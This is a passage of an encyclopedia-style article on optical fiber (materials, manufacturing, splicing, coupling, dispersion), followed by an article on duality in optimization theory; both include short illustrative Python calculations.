At the atomic or molecular level, absorption depends on the frequencies of atomic or molecular vibrations or chemical bonds, how closely packed the atoms or molecules are, and whether or not they exhibit long-range order. These factors determine the capacity of the material to transmit longer wavelengths in the infrared (IR), far IR, radio, and microwave ranges.

The design of any optically transparent device requires the selection of materials based upon knowledge of their properties and limitations. The crystal structure absorption characteristics observed at the lower frequency regions (mid- to far-IR wavelength range) define the long-wavelength transparency limit of the material. They are the result of the interactive coupling between the motions of thermally induced vibrations of the constituent atoms and molecules of the solid lattice and the incident light wave radiation. Hence, all materials are bounded by limiting regions of absorption caused by atomic and molecular vibrations (bond stretching) in the far-infrared (>10 μm). In other words, the selective absorption of IR light by a particular material occurs because the selected frequency of the light wave matches the frequency (or an integer multiple of the frequency, i.e. a harmonic) at which the particles of that material vibrate. Since different atoms and molecules have different natural frequencies of vibration, they selectively absorb different frequencies (or portions of the spectrum) of IR light. Reflection and transmission of light waves occur because the frequencies of the light waves do not match the natural resonant frequencies of vibration of the objects. When IR light of these frequencies strikes an object, the energy is either reflected or transmitted.

Loss budget
Attenuation over a cable run is significantly increased by the inclusion of connectors and splices.
When computing the acceptable attenuation (loss budget) between a transmitter and a receiver, one includes the dB loss due to the type and length of fiber optic cable, the dB loss introduced by connectors, and the dB loss introduced by splices. Well-polished connectors typically introduce 0.3 dB per connector; splices typically introduce less than 0.2 dB per splice. The total loss can be calculated by:

Loss = dB loss per connector × number of connectors + dB loss per splice × number of splices + dB loss per kilometer × kilometers of fiber,

where the dB loss per kilometer is a function of the type of fiber and can be found in the manufacturer's specifications. For example, a typical 1550 nm single-mode fiber has a loss of 0.3 dB per kilometer. The calculated loss budget is used when testing to confirm that the measured loss is within the normal operating parameters.

Manufacturing
Materials
Glass optical fibers are almost always made from silica, but some other materials, such as fluorozirconate, fluoroaluminate, and chalcogenide glasses, as well as crystalline materials like sapphire, are used for longer-wavelength infrared or other specialized applications. Silica and fluoride glasses usually have refractive indices of about 1.5, but some materials such as the chalcogenides can have indices as high as 3. Typically the index difference between core and cladding is less than one percent. Plastic optical fibers (POF) are commonly step-index multi-mode fibers with a core diameter of 0.5 millimeters or larger. POF typically have higher attenuation coefficients than glass fibers, 1 dB/m or higher, and this high attenuation limits the range of POF-based systems.

Silica
Silica exhibits fairly good optical transmission over a wide range of wavelengths. In the near-infrared (near IR) portion of the spectrum, particularly around 1.5 μm, silica can have extremely low absorption and scattering losses, of the order of 0.2 dB/km. Such low losses depend on using ultra-pure silica. High transparency in the 1.4-μm region is achieved by maintaining a low concentration of hydroxyl (OH) groups; alternatively, a high OH concentration is better for transmission in the ultraviolet (UV) region.

Silica can be drawn into fibers at reasonably high temperatures and has a fairly broad glass transformation range. Another advantage is that fusion splicing and cleaving of silica fibers is relatively effective. Silica fiber also has high mechanical strength against pulling and even bending, provided that the fiber is not too thick and that the surfaces have been well prepared during processing. Even simple cleaving of the ends of the fiber can provide nicely flat surfaces with acceptable optical quality. Silica is also relatively chemically inert. In particular, it is not hygroscopic (does not absorb water).

Silica glass can be doped with various materials. One purpose of doping is to raise the refractive index (e.g. with germanium dioxide (GeO2) or aluminium oxide (Al2O3)) or to lower it (e.g. with fluorine or boron trioxide (B2O3)). Doping is also possible with laser-active ions (for example, rare-earth-doped fibers) in order to obtain active fibers to be used, for example, in fiber amplifiers or laser applications. Both the fiber core and cladding are typically doped, so that the entire assembly (core and cladding) is effectively the same compound (e.g. an aluminosilicate, germanosilicate, phosphosilicate or borosilicate glass).
Particularly for active fibers, pure silica is usually not a very suitable host glass, because it exhibits a low solubility for rare-earth ions. This can lead to quenching effects due to clustering of dopant ions. Aluminosilicates are much more effective in this respect. Silica fiber also exhibits a high threshold for optical damage. This property ensures a low tendency for laser-induced breakdown, which is important for fiber amplifiers used for the amplification of short pulses. Because of these properties, silica fibers are the material of choice in many optical applications, such as communications (except for very short distances with plastic optical fiber), fiber lasers, fiber amplifiers, and fiber-optic sensors. Large efforts put forth in the development of various types of silica fibers have further increased the performance of such fibers over other materials.

Fluoride glass
Fluoride glass is a class of non-oxide optical quality glasses composed of fluorides of various metals. Because of the low viscosity of these glasses, it is very difficult to completely avoid crystallization while processing them through the glass transition (or drawing the fiber from the melt). Thus, although heavy metal fluoride glasses (HMFG) exhibit very low optical attenuation, they are not only difficult to manufacture but also quite fragile, and have poor resistance to moisture and other environmental attacks. Their best attribute is that they lack the absorption band associated with the hydroxyl (OH) group (3,200–3,600 cm−1; i.e., 2,777–3,125 nm or 2.78–3.13 μm), which is present in nearly all oxide-based glasses. Such low losses were never realized in practice, and the fragility and high cost of fluoride fibers made them less than ideal as primary candidates. Fluoride fibers are used in mid-IR spectroscopy, fiber optic sensors, thermometry, and imaging. Fluoride fibers can also be used for guided lightwave transmission in media such as YAG (yttrium aluminium garnet) lasers at 2.9 μm, as required for medical applications (e.g. ophthalmology and dentistry). An example of a heavy metal fluoride glass is the ZBLAN glass group, composed of zirconium, barium, lanthanum, aluminium, and sodium fluorides. Their main technological application is as optical waveguides in both planar and fiber forms. They are advantageous especially in the mid-infrared (2,000–5,000 nm) range.

Phosphate glass
Phosphate glass is a class of optical glasses composed of metaphosphates of various metals. Instead of the SiO4 tetrahedra observed in silicate glasses, the building block for this glass is phosphorus pentoxide (P2O5), which crystallizes in at least four different forms. The most familiar polymorph is the cage-like structure of P4O10. Phosphate glasses can be advantageous over silica glasses for optical fibers with a high concentration of doping rare-earth ions. A mix of fluoride glass and phosphate glass is fluorophosphate glass.

Chalcogenide glass
The chalcogens, the elements in group 16 of the periodic table, particularly sulfur (S), selenium (Se), and tellurium (Te), react with more electropositive elements, such as silver, to form chalcogenides. These are extremely versatile compounds, in that they can be crystalline or amorphous, metallic or semiconducting, and conductors of ions or electrons. Chalcogenide glass can be used to make fibers for far-infrared transmission.
Process
Preform
Standard optical fibers are made by first constructing a large-diameter preform with a carefully controlled refractive index profile, and then pulling the preform to form the long, thin optical fiber. The preform is commonly made by one of three chemical vapor deposition methods: inside vapor deposition, outside vapor deposition, and vapor axial deposition.

With inside vapor deposition, the preform starts as a hollow glass tube approximately long, which is placed horizontally and rotated slowly on a lathe. Gases such as silicon tetrachloride (SiCl4) or germanium tetrachloride (GeCl4) are injected with oxygen into the end of the tube. The gases are then heated by means of an external hydrogen burner, bringing the temperature of the gas up to 1,900 K (1,600 °C, 3,000 °F), where the tetrachlorides react with oxygen to produce silica or germanium dioxide particles. When the reaction conditions are chosen to allow this reaction to occur in the gas phase throughout the tube volume, in contrast to earlier techniques where the reaction occurred only on the glass surface, the technique is called modified chemical vapor deposition. The oxide particles then agglomerate to form large particle chains, which subsequently deposit on the walls of the tube as soot. The deposition is due to the large difference in temperature between the gas core and the wall, which causes the gas to push the particles outward, in a process known as thermophoresis. The torch is then traversed up and down the length of the tube to deposit the material evenly. After the torch has reached the end of the tube, it is brought back to the beginning of the tube and the deposited particles are melted to form a solid layer. This process is repeated until a sufficient amount of material has been deposited. For each layer the composition can be modified by varying the gas composition, resulting in precise control of the finished fiber's optical properties.

In outside vapor deposition or vapor axial deposition, the glass is formed by flame hydrolysis, a reaction in which silicon tetrachloride and germanium tetrachloride are oxidized by reaction with water in an oxyhydrogen flame. In outside vapor deposition, the glass is deposited onto a solid rod, which is removed before further processing. In vapor axial deposition, a short seed rod is used, and a porous preform, whose length is not limited by the size of the source rod, is built up on its end. The porous preform is consolidated into a transparent, solid preform by heating to about 1,800 K (1,500 °C, 2,800 °F).

Typical communications fiber uses a circular preform. For some applications, such as double-clad fibers, another shape is preferred. In fiber lasers based on double-clad fiber, an asymmetric shape improves the filling factor for laser pumping. Because of surface tension, the shape is smoothed during the drawing process, and the shape of the resulting fiber does not reproduce the sharp edges of the preform. Nevertheless, careful polishing of the preform is important, since any defects of the preform surface affect the optical and mechanical properties of the resulting fiber.

Drawing
The preform, regardless of construction, is placed in a device known as a drawing tower, where the preform tip is heated and the optical fiber is pulled out as a string. The tension on the fiber can be controlled to maintain the desired fiber thickness.
Cladding
The light is guided down the core of the fiber by an optical cladding with a lower refractive index that traps light in the core through total internal reflection. For some types of fiber, the cladding is made of glass and is drawn along with the core from a preform with a radially varying index of refraction. For other types of fiber, the cladding is made of plastic and is applied like a coating (see below).

Coatings
The cladding is coated by a buffer (not to be confused with an actual buffer tube) that protects it from moisture and physical damage. These coatings are UV-cured urethane acrylate composite or polyimide materials applied to the outside of the fiber during the drawing process. The coatings protect the very delicate strands of glass fiber, which are about the size of a human hair, and allow the fiber to survive the rigors of manufacturing, proof testing, cabling, and installation. The buffer coating must be stripped off the fiber for termination or splicing.

Today's glass optical fiber draw processes employ a dual-layer coating approach. An inner primary coating is designed to act as a shock absorber to minimize attenuation caused by microbending. An outer secondary coating protects the primary coating against mechanical damage and acts as a barrier to lateral forces, and may be colored to differentiate strands in bundled cable constructions. These fiber optic coating layers are applied during the fiber draw, at speeds approaching . Fiber optic coatings are applied using one of two methods: wet-on-dry and wet-on-wet. In wet-on-dry, the fiber passes through a primary coating application, which is then UV cured, and then through the secondary coating application, which is subsequently cured. In wet-on-wet, the fiber passes through both the primary and secondary coating applications and then goes to UV curing.

The thickness of the coating is taken into account when calculating the stress that the fiber experiences under different bend configurations. When a coated fiber is wrapped around a mandrel, the stress experienced by the fiber is given by

$\sigma = E \, \frac{d_f}{D_m + d_c}$,

where $E$ is the fiber's Young's modulus, $D_m$ is the diameter of the mandrel, $d_f$ is the diameter of the cladding, and $d_c$ is the diameter of the coating. In a two-point bend configuration, a coated fiber is bent in a U-shape and placed between the grooves of two faceplates, which are brought together until the fiber breaks. The stress in the fiber in this configuration is given by

$\sigma = 1.198 \, E \, \frac{d_f}{D - d_c}$,

where $D$ is the distance between the faceplates. The coefficient 1.198 is a geometric constant associated with this configuration.

Fiber optic coatings protect the glass fibers from scratches that could lead to strength degradation. The combination of moisture and scratches accelerates the aging and deterioration of fiber strength. When fiber is subjected to low stresses over a long period, fiber fatigue can occur. Over time or in extreme conditions, these factors combine to cause microscopic flaws in the glass fiber to propagate, which can ultimately result in fiber failure. Three key characteristics of fiber optic waveguides can be affected by environmental conditions: strength, attenuation, and resistance to losses caused by microbending. External optical fiber cable jackets and buffer tubes protect glass optical fiber from environmental conditions that can affect the fiber's performance and long-term durability. On the inside, coatings ensure the reliability of the signal being carried and help minimize attenuation due to microbending.
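As a worked version of the two bend-stress formulas above, here is a small Python sketch. The fiber dimensions and the Young's modulus for fused silica are illustrative values assumed for the example (roughly standard 125 µm cladding and 250 µm coated diameter), not figures from this article.

```python
def mandrel_wrap_stress(E: float, d_f: float, D_m: float, d_c: float) -> float:
    """Stress in a coated fiber wrapped around a mandrel:
    sigma = E * d_f / (D_m + d_c), from the formula above."""
    return E * d_f / (D_m + d_c)

def two_point_bend_stress(E: float, d_f: float, D: float, d_c: float) -> float:
    """Stress in the two-point bend test:
    sigma = 1.198 * E * d_f / (D - d_c), from the formula above."""
    return 1.198 * E * d_f / (D - d_c)

# Illustrative (assumed) values: E ~ 72 GPa for fused silica, 125 um
# cladding, 250 um coated diameter, 25 mm mandrel, 5 mm faceplate gap.
E, d_f, d_c = 72e9, 125e-6, 250e-6  # Pa, m, m
print(f"{mandrel_wrap_stress(E, d_f, 25e-3, d_c) / 1e6:.0f} MPa")   # ~356 MPa
print(f"{two_point_bend_stress(E, d_f, 5e-3, d_c) / 1e6:.0f} MPa")  # ~2270 MPa
```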
Cable construction In practical fibers, the cladding is usually coated with a tough resin and features an additional buffer layer, which may be further surrounded by a jacket layer, usually plastic. These layers add strength to the fiber but do not affect its optical properties. Rigid fiber assemblies sometimes put light-absorbing glass between the fibers, to prevent light that leaks out of one fiber from entering another. This reduces crosstalk between the fibers, or reduces flare in fiber bundle imaging applications. Multi-fiber cable usually uses colored buffers to identify each strand. Modern cables come in a wide variety of sheathings and armor, designed for applications such as direct burial in trenches, high voltage isolation, dual use as power lines, installation in conduit, lashing to aerial telephone poles, submarine installation, and insertion in paved streets. Some fiber optic cable versions are reinforced with aramid yarns or glass yarns as an intermediary strength member. In commercial terms, use of glass yarns is more cost-effective with no loss of mechanical durability. Glass yarns also protect the cable core against rodents and termites. Practical issues Installation Fiber cable can be very flexible, but traditional fiber's loss increases greatly if the fiber is bent with a radius smaller than around 30 mm. This creates a problem when the cable is bent around corners. Bendable fibers, targeted toward easier installation in home environments, have been standardized as ITU-T G.657. This type of fiber can be bent with a radius as low as 7.5 mm without adverse impact. Even more bendable fibers have been developed. Bendable fiber may also be resistant to fiber hacking, in which the signal in a fiber is surreptitiously monitored by bending the fiber and detecting the leakage. Another important feature of a cable is its ability to withstand tension, which determines how much force can be applied to the cable during installation. Termination and splicing Optical fibers are connected to terminal equipment by optical fiber connectors. These connectors are usually of a standard type such as FC, SC, ST, LC, MTRJ, MPO or SMA. Optical fibers may be connected by connectors, typically on a patch panel, or permanently by splicing, that is, joining two fibers together to form a continuous optical waveguide. The generally accepted splicing method is fusion splicing, which melts the fiber ends together. For quicker fastening jobs, a mechanical splice is used. All splicing techniques involve installing an enclosure that protects the splice. Fusion splicing is done with a specialized instrument. The fiber ends are first stripped of their protective polymer coating (as well as the more sturdy outer jacket, if present). The ends are cleaved with a precision cleaver to make them perpendicular, and are placed into special holders in the fusion splicer. The splice is usually inspected via a magnified viewing screen to check the cleaves before the splice and the fusion after it. The splicer uses small motors to align the end faces together, and emits a small spark between electrodes at the gap to burn off dust and moisture. Then the splicer generates a larger spark that raises the temperature above the melting point of the glass, fusing the ends permanently. The location and energy of the spark are carefully controlled so that the molten core and cladding do not mix, which minimizes optical loss. 
A splice loss estimate is measured by the splicer by directing light through the cladding on one side and measuring the light leaking from the cladding on the other side. A splice loss under 0.1 dB is typical. The complexity of this process makes fiber splicing much more difficult than splicing copper wire. Mechanical fiber splices are designed to be quicker and easier to install, but there is still the need for stripping, careful cleaning, and precision cleaving. The fiber ends are aligned and held together by a precision sleeve, often using a clear index-matching gel that enhances the transmission of light across the joint. Mechanical splices typically have a higher optical loss and are less robust than fusion splices, especially if the gel is used. Fibers are terminated in connectors that hold the fiber end precisely and securely. An optical fiber connector is a rigid cylindrical barrel surrounded by a sleeve that holds the barrel in its mating socket. The mating mechanism can be push and click, turn and latch (bayonet mount), or screw-in (threaded). The barrel is typically free to move within the sleeve and may have a key that prevents the barrel and fiber from rotating as the connectors are mated. A typical connector is installed by preparing the fiber end and inserting it into the rear of the connector body. Quick-set adhesive is usually used to hold the fiber securely, and a strain relief is secured to the rear. Once the adhesive sets, the fiber's end is polished. Various polish profiles are used, depending on the type of fiber and the application. Any small air gap remaining between mated fiber ends causes a signal strength loss known as gap loss. For single-mode fiber, fiber ends are typically polished with a slight curvature that makes the mated connectors touch only at their cores. This is called a physical contact (PC) polish. The curved surface may be polished at an angle, to make an angled physical contact (APC) connection. Such connections have higher loss than PC connections but greatly reduced back reflection, because light that reflects from the angled surface leaks out of the fiber core. APC fiber ends have low back reflection even when disconnected. In the 1990s, the number of parts per connector, polishing of the fibers, and the need to oven-bake the epoxy in each connector made terminating fiber optic cables difficult. Today, connector types on the market offer easier, less labor-intensive ways of terminating cables. Some of the most popular connectors are pre-polished at the factory and include a gel inside the connector. A cleave is made at a required length, to get as close as possible to the polished piece already inside the connector. The gel surrounds the point where the two pieces meet inside the connector, resulting in very little light loss. For the most demanding installations, factory pre-polished pigtails of sufficient length to reach the first fusion splice enclosure assure good performance and minimize on-site labor. Free-space coupling It is often necessary to align an optical fiber with another optical fiber or with an optoelectronic device such as a light-emitting diode, a laser diode, or a modulator. This can involve either carefully aligning the fiber and placing it in contact with the device, or can use a lens to allow coupling over an air gap. Typically the size of the fiber mode is much larger than the size of the mode in a laser diode or a silicon optical chip. In this case, a tapered or lensed fiber is used to match the fiber mode field distribution to that of the other element. 
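For the mode-matching problem just described, a standard result for two perfectly aligned Gaussian modes (assumed here; the text itself gives no formula) puts the power coupling efficiency at $\eta = (2 w_1 w_2 / (w_1^2 + w_2^2))^2$, where $w_1$ and $w_2$ are the mode-field radii. A minimal sketch:

```python
def gaussian_coupling_efficiency(w1: float, w2: float) -> float:
    """Power coupling efficiency between two perfectly aligned Gaussian
    modes with mode-field radii w1 and w2 (no tilt or lateral offset)."""
    return (2.0 * w1 * w2 / (w1**2 + w2**2)) ** 2

# A single-mode fiber mode (~5.2 µm radius, an assumed typical value)
# butt-coupled to a ~1 µm laser-diode mode couples poorly:
print(f"{gaussian_coupling_efficiency(5.2, 1.0):.1%}")  # ~13.8%
# A lensed or tapered fiber that transforms the mode to ~4.5 µm
# pushes the efficiency close to unity:
print(f"{gaussian_coupling_efficiency(5.2, 4.5):.1%}")  # ~97.9%
```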
The lens on the end of the fiber can be formed using polishing, laser cutting or fusion splicing. In a laboratory environment, a bare fiber end is coupled using a fiber launch system, which uses a microscope objective lens to focus the light down to a fine point. A precision translation stage (micro-positioning table) is used to move the lens, fiber, or device to allow the coupling efficiency to be optimized. Fibers with a connector on the end make this process much simpler: the connector is simply plugged into a pre-aligned fiber-optic collimator, which contains a lens that is either accurately positioned with respect to the fiber or is adjustable. To achieve the best injection efficiency into a single-mode fiber, the direction, position, size, and divergence of the beam must all be optimized. With good optimization, 70 to 90% coupling efficiency can be achieved. With properly polished single-mode fibers, the emitted beam has an almost perfect Gaussian shape—even in the far field—if a good lens is used. The lens needs to be large enough to support the full numerical aperture of the fiber, and must not introduce aberrations in the beam. Aspheric lenses are typically used. Fiber fuse At optical intensities above 2 megawatts per square centimeter, when a fiber is subjected to a shock or is otherwise suddenly damaged, a fiber fuse can occur. The reflection from the damage vaporizes the fiber immediately before the break, and this new defect remains reflective so that the damage propagates back toward the transmitter at 1–3 meters per second (4–11 km/h, 2–8 mph). The open fiber control system, which ensures laser eye safety in the event of a broken fiber, can also effectively halt propagation of the fiber fuse. In situations such as undersea cables, where high power levels might be used without the need for open fiber control, a fiber fuse protection device at the transmitter can break the circuit to minimize damage. Chromatic dispersion The refractive index of fibers varies slightly with the frequency of light, and light sources are not perfectly monochromatic. Modulation of the light source to transmit a signal also slightly widens the frequency band of the transmitted light. This has the effect that, over long distances and at high modulation speeds, different portions of the light can take different times to arrive at the receiver, ultimately making the signal impossible to discern. This problem can be overcome in several ways, including the use of extra repeaters and the use of a relatively short length of fiber that has the opposite refractive index gradient.
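As a back-of-the-envelope illustration of chromatic dispersion, the standard broadening relation $\Delta t \approx D \cdot L \cdot \Delta\lambda$ (assumed here, not stated in the text) estimates how much a pulse spreads over a link; the numbers below are hypothetical but typical of standard single-mode fiber near 1550 nm.

```python
def pulse_broadening_ps(D_ps_per_nm_km: float, length_km: float,
                        linewidth_nm: float) -> float:
    """Chromatic-dispersion pulse broadening: delta_t = D * L * delta_lambda,
    with D in ps/(nm km), L in km, and the source linewidth in nm."""
    return D_ps_per_nm_km * length_km * linewidth_nm

# Hypothetical link: ~17 ps/(nm km) dispersion near 1550 nm, an 80 km
# span, and a 0.1 nm source linewidth:
dt = pulse_broadening_ps(17.0, 80.0, 0.1)
print(f"broadening ≈ {dt:.0f} ps")  # 136 ps — significant next to the
# 100 ps bit slot of a 10 Gbit/s signal, hence dispersion management.
```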
Technology
Basics_9
null
3372717
https://en.wikipedia.org/wiki/Duality%20%28optimization%29
Duality (optimization)
In mathematical optimization theory, duality or the duality principle is the principle that optimization problems may be viewed from either of two perspectives, the primal problem or the dual problem. If the primal is a minimization problem then the dual is a maximization problem (and vice versa). Any feasible solution to the primal (minimization) problem is at least as large as any feasible solution to the dual (maximization) problem. Therefore, the solution to the primal is an upper bound to the solution of the dual, and the solution of the dual is a lower bound to the solution of the primal. This fact is called weak duality. In general, the optimal values of the primal and dual problems need not be equal. Their difference is called the duality gap. For convex optimization problems, the duality gap is zero under a constraint qualification condition. This fact is called strong duality. Dual problem Usually the term "dual problem" refers to the Lagrangian dual problem but other dual problems are used – for example, the Wolfe dual problem and the Fenchel dual problem. The Lagrangian dual problem is obtained by forming the Lagrangian of a minimization problem by using nonnegative Lagrange multipliers to add the constraints to the objective function, and then solving for the primal variable values that minimize the Lagrangian. This solution gives the primal variables as functions of the Lagrange multipliers, which are called dual variables, so that the new problem is to maximize the objective function with respect to the dual variables under the derived constraints on the dual variables (including at least the nonnegativity constraints). In general, given two dual pairs of separated locally convex spaces $(X, X^*)$ and $(Y, Y^*)$ and the function $f: X \to \mathbb{R} \cup \{+\infty\}$, we can define the primal problem as finding $\hat{x}$ such that $f(\hat{x}) = \inf_{x \in X} f(x)$. In other words, if $\hat{x}$ exists, $f(\hat{x})$ is the minimum of the function $f$ and the infimum (greatest lower bound) of the function is attained. If there are constraint conditions, these can be built into the function $f$ by letting $\tilde{f} = f + I_{\text{constraints}}$, where $I_{\text{constraints}}$ is a suitable function on $X$ that has a minimum 0 on the constraints, and for which one can prove that $\inf_{x \in X} \tilde{f}(x) = \inf_{x \text{ constrained}} f(x)$. The latter condition is trivially, but not always conveniently, satisfied for the characteristic function (i.e. $I_{\text{constraints}}(x) = 0$ for $x$ satisfying the constraints and $I_{\text{constraints}}(x) = \infty$ otherwise). Then extend $\tilde{f}$ to a perturbation function $F: X \times Y \to \mathbb{R} \cup \{+\infty\}$ such that $F(x, 0) = \tilde{f}(x)$. The duality gap is the difference of the right and left hand sides of the inequality $\sup_{y^* \in Y^*} -F^*(0, y^*) \le \inf_{x \in X} F(x, 0)$, where $F^*$ is the convex conjugate in both variables and $\sup$ denotes the supremum (least upper bound). Duality gap The duality gap is the difference between the values of any primal solutions and any dual solutions. If $d^*$ is the optimal dual value and $p^*$ is the optimal primal value, then the duality gap is equal to $p^* - d^*$. This value is always greater than or equal to 0 (for minimization problems). The duality gap is zero if and only if strong duality holds. Otherwise the gap is strictly positive and weak duality holds. In computational optimization, another "duality gap" is often reported, which is the difference in value between any dual solution and the value of a feasible but suboptimal iterate for the primal problem. 
This alternative "duality gap" quantifies the discrepancy between the value of a current feasible but suboptimal iterate for the primal problem and the value of the dual problem; the value of the dual problem is, under regularity conditions, equal to the value of the convex relaxation of the primal problem. The convex relaxation is the problem arising from replacing a non-convex feasible set with its closed convex hull and replacing a non-convex function with its convex closure, that is, the function whose epigraph is the closed convex hull of the epigraph of the original primal objective function. Linear case Linear programming problems are optimization problems in which the objective function and the constraints are all linear. In the primal problem, the objective function is a linear combination of n variables. There are m constraints, each of which places an upper bound on a linear combination of the n variables. The goal is to maximize the value of the objective function subject to the constraints. A solution is a vector (a list) of n values that achieves the maximum value for the objective function. In the dual problem, the objective function is a linear combination of the m values that are the limits in the m constraints from the primal problem. There are n dual constraints, each of which places a lower bound on a linear combination of m dual variables. Relationship between the primal problem and the dual problem In the linear case, in the primal problem, from each sub-optimal point that satisfies all the constraints, there is a direction or subspace of directions to move that increases the objective function. Moving in any such direction is said to remove slack between the candidate solution and one or more constraints. An infeasible value of the candidate solution is one that exceeds one or more of the constraints. In the dual problem, the dual vector multiplies the constraints that determine the positions of the constraints in the primal. Varying the dual vector in the dual problem is equivalent to revising the upper bounds in the primal problem. The lowest upper bound is sought. That is, the dual vector is minimized in order to remove slack between the candidate positions of the constraints and the actual optimum. An infeasible value of the dual vector is one that is too low. It sets the candidate positions of one or more of the constraints in a position that excludes the actual optimum. This intuition is made formal by the equations in Linear programming: Duality. Nonlinear case In nonlinear programming, the constraints are not necessarily linear. Nonetheless, many of the same principles apply. To ensure that the global maximum of a non-linear problem can be identified easily, the problem formulation often requires that the functions be convex and have compact lower level sets. This is the significance of the Karush–Kuhn–Tucker conditions. They provide necessary conditions for identifying local optima of non-linear programming problems. There are additional conditions (constraint qualifications) that are necessary so that it will be possible to define the direction to an optimal solution. An optimal solution is one that is a local optimum, but possibly not a global optimum. Lagrange duality Motivation. Suppose we want to solve the following nonlinear programming problem: minimize $f(x)$ subject to $f_i(x) \le 0$ for $i \in \{1, \ldots, m\}$. The problem has $m$ constraints; we would like to convert it to a program without constraints. 
Theoretically, it is possible to do it by minimizing the function $J(x) := f(x) + \sum_{i=1}^m I[f_i(x)]$, where $I$ is an infinite step function: $I[u] = 0$ if $u \le 0$, and $I[u] = \infty$ otherwise. But $J(x)$ is hard to minimize as it is not continuous. It is possible to "approximate" $I[u]$ by $\lambda u$, where $\lambda$ is a positive constant. This yields a function known as the Lagrangian: $L(x, \lambda) := f(x) + \sum_{i=1}^m \lambda_i f_i(x)$. Note that, for every $x$, $\max_{\lambda \ge 0} L(x, \lambda) = J(x)$. Proof: if $x$ satisfies all constraints $f_i(x) \le 0$, then $L(x, \lambda)$ is maximized when taking $\lambda = 0$, and its value is then $f(x)$; if $x$ violates some constraint, i.e. $f_i(x) > 0$ for some $i$, then $L(x, \lambda) \to \infty$ when $\lambda_i \to \infty$. Therefore, the original problem is equivalent to $\min_x \max_{\lambda \ge 0} L(x, \lambda)$. By reversing the order of min and max, we get $\max_{\lambda \ge 0} \min_x L(x, \lambda)$. The dual function is the inner problem in the above formula: $g(\lambda) := \min_x L(x, \lambda)$. The Lagrangian dual program is the program of maximizing $g$: $\max_{\lambda \ge 0} g(\lambda)$. The optimal solution to the dual program is a lower bound for the optimal solution of the original (primal) program; this is the weak duality principle. If the primal problem is convex and bounded from below, and there exists a point in which all nonlinear constraints are strictly satisfied (Slater's condition), then the optimal solution to the dual program equals the optimal solution of the primal program; this is the strong duality principle. In this case, we can solve the primal program by finding an optimal solution $\lambda^*$ to the dual program, and then solving $\min_x L(x, \lambda^*)$. Note that, to use either the weak or the strong duality principle, we need a way to compute $g(\lambda)$. In general this may be hard, as we need to solve a different minimization problem for every $\lambda$. But for some classes of functions, it is possible to get an explicit formula for $g$. Solving the primal and dual programs together is often easier than solving only one of them. Examples are linear programming and quadratic programming. A better and more general approach to duality is provided by Fenchel's duality theorem. Another condition in which the min-max and max-min are equal is when the Lagrangian has a saddle point: $(x^*, \lambda^*)$ is a saddle point of the Lagrange function $L$ if and only if $x^*$ is an optimal solution to the primal, $\lambda^*$ is an optimal solution to the dual, and the optimal values in the indicated problems are equal to each other. The strong Lagrange principle Given a nonlinear programming problem in standard form, minimize $f_0(x)$ subject to $f_i(x) \le 0$ for $i \in \{1, \ldots, m\}$ and $h_i(x) = 0$ for $i \in \{1, \ldots, p\}$, with the domain $\mathcal{D} \subset \mathbb{R}^n$ having non-empty interior, the Lagrangian function $L: \mathbb{R}^n \times \mathbb{R}^m \times \mathbb{R}^p \to \mathbb{R}$ is defined as $L(x, \lambda, \nu) = f_0(x) + \sum_{i=1}^m \lambda_i f_i(x) + \sum_{i=1}^p \nu_i h_i(x)$. The vectors $\lambda$ and $\nu$ are called the dual variables or Lagrange multiplier vectors associated with the problem. The Lagrange dual function $g: \mathbb{R}^m \times \mathbb{R}^p \to \mathbb{R}$ is defined as $g(\lambda, \nu) = \inf_{x \in \mathcal{D}} L(x, \lambda, \nu)$. The dual function $g$ is concave, even when the initial problem is not convex, because it is a point-wise infimum of affine functions. The dual function yields lower bounds on the optimal value $p^*$ of the initial problem; for any $\lambda \ge 0$ and any $\nu$ we have $g(\lambda, \nu) \le p^*$. If a constraint qualification such as Slater's condition holds and the original problem is convex, then we have strong duality, i.e. $d^* = \max_{\lambda \ge 0, \nu} g(\lambda, \nu) = p^*$. Convex problems For a convex minimization problem with inequality constraints, minimize $f(x)$ subject to $g_i(x) \le 0$ for $i = 1, \ldots, m$, the Lagrangian dual problem is to maximize $\inf_x \left( f(x) + \sum_{j=1}^m u_j g_j(x) \right)$ over $u \ge 0$, where the objective function is the Lagrange dual function. Provided that the functions $f$ and $g_1, \ldots, g_m$ are continuously differentiable, the infimum occurs where the gradient is equal to zero. The problem of maximizing $f(x) + \sum_{j=1}^m u_j g_j(x)$ over $(x, u)$ subject to $\nabla f(x) + \sum_{j=1}^m u_j \nabla g_j(x) = 0$ and $u \ge 0$ is called the Wolfe dual problem. This problem may be difficult to deal with computationally, because the objective function is not concave in the joint variables $(u, x)$. Also, the equality constraint $\nabla f(x) + \sum_{j=1}^m u_j \nabla g_j(x) = 0$ is nonlinear in general, so the Wolfe dual problem is typically a nonconvex optimization problem. In any case, weak duality holds. 
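A worked miniature of the Lagrangian recipe above (an invented illustrative problem, not one from the text): minimize $f(x) = x^2$ subject to $f_1(x) = 1 - x \le 0$. The dual function has a closed form here, and Slater's condition holds ($x = 2$ is strictly feasible), so strong duality applies and maximizing the dual recovers the primal optimum $p^* = 1$.

```python
# Primal: minimize x**2 subject to 1 - x <= 0; optimum x* = 1, p* = 1.
# Lagrangian: L(x, lam) = x**2 + lam * (1 - x).
# For fixed lam >= 0, L is minimized at x = lam / 2, so the dual
# function is g(lam) = lam - lam**2 / 4, concave and maximized at
# lam* = 2 with g(2) = 1 = p*: strong duality, zero gap.

def g(lam: float) -> float:
    x = lam / 2.0                  # argmin over x of L(x, lam)
    return x**2 + lam * (1.0 - x)  # equals lam - lam**2 / 4

lams = [i / 100.0 for i in range(401)]  # grid over [0, 4]
lam_star = max(lams, key=g)
print(lam_star, g(lam_star))  # ~2.0, ~1.0 — matches the primal optimum
# Recovering the primal solution from lam*: x* = lam* / 2 = 1.
```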
History According to George Dantzig, the duality theorem for linear optimization was conjectured by John von Neumann immediately after Dantzig presented the linear programming problem. Von Neumann noted that he was using information from his game theory, and conjectured that a two-person zero-sum matrix game was equivalent to linear programming. Rigorous proofs were first published in 1948 by Albert W. Tucker and his group. (Dantzig's foreword to Nering and Tucker, 1993) Applications In support vector machines (SVMs), formulating the primal problem of SVMs as the dual problem can be used to implement the kernel trick, but the latter has higher time complexity in the historical cases.
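To make the linear-programming duality concrete, here is a minimal numerical sketch (assuming SciPy is available; the particular LP is a standard textbook example, not from the text). The primal maximizes $c^\top x$ subject to $Ax \le b$, $x \ge 0$; its dual minimizes $b^\top y$ subject to $A^\top y \ge c$, $y \ge 0$, and since strong duality holds for feasible bounded LPs, the two optimal values coincide.

```python
import numpy as np
from scipy.optimize import linprog

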